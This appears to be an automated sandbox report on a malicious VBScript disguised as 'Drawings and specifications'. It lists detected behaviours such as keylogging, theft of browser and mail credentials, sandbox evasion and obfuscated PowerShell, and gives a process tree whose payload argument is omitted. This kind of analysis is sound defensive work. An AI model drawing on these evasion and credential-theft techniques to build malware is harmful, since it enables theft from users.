Analysis Report
Drawings_and_specifications.vbs
Overview
General Information
Detection
Score: 88 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Very long command line found
May check the online IP address of the machine
Obfuscated command line found
Uses ipconfig to lookup or modify the Windows network settings
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Classification
- System is w10x64native
- wscript.exe (PID: 7124, cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Drawings_and_specifications.vbs", MD5: 0639B0A6F69B3265C1E42227D650B7D1)
  - ipconfig.exe (PID: 6164, cmdline: ipconfig /flushdns, MD5: 62F170FB07FDBB79CEB7147101406EB8)
  - conhost.exe (PID: 4452, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  - cmd.exe (PID: 1820, cmdline: cmd /k echo hell, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 1696, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  - powershell.exe (PID: 3588, cmdline:
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Boykott = ... [obfuscated PowerShell command-line argument omitted; the report truncates it])